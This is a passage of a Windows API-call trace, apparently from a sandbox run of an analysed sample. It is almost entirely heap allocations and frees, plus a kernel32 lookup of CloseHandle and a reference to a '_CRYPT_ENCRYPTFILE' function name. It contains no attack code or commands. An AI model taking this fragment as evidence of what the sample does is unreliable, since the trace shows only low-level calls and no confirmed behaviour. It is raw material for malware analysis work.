hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0084.855] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0084.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0084.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4e98 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0084.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.857] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0084.857] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0084.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0084.857] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0084.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0084.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0084.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.859] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca4a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.859] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0084.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0084.860] CloseHandle (hObject=0x258) returned 1 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0084.860] FreeLibrary (hLibModule=0x772d0000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0084.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.861] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0084.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0084.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0084.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0084.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0084.862] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0084.862] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2370 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0084.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0084.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2500 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0084.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 